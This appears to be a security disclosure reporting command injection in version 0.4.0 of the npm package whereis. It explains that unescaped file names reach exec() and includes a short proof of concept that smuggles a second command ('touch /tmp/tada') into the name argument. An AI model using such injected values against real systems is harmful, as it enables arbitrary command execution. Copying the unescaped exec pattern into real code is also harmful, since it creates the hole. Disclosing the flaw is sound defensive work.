I would like to report command injection in whereis
It allows an attacker to inject arbitrary shell commands by having the module locate a crafted file name.

module name: whereis
version: 0.4.0
npm page: https://www.npmjs.com/package/whereis
> Simply get the first path to a bin on any system.
Stats
101 downloads in the last day
5 403 downloads in the last week
18 945 downloads in the last month
~227 340 estimated downloads per year [JUST FOR REFERENCE, ~DOWNLOADS PER MONTH*12]
The file name argument is not escaped before being concatenated into the shell command string that is passed to exec(). Because exec() runs that string through a shell, any shell metacharacters in the name (`;`, `|`, `&&`, `$(...)`, backticks) are interpreted by the shell rather than treated as part of the name.
See lines https://github.com/vvo/node-whereis/blob/master/index.js#L4-L12
```js
var whereis = require('whereis');

// The ';' terminates the lookup command and starts a second command,
// which the shell executes in the same exec() call.
var filename = 'wget; touch /tmp/tada';

whereis(filename, function(err, path) {
  console.log(path);
});
```
Observe that the file /tmp/tada is created, which shows the second command ran.
In any setup where unsanitized user input can reach the whereis argument, an attacker can execute arbitrary shell commands with the privileges of the Node process.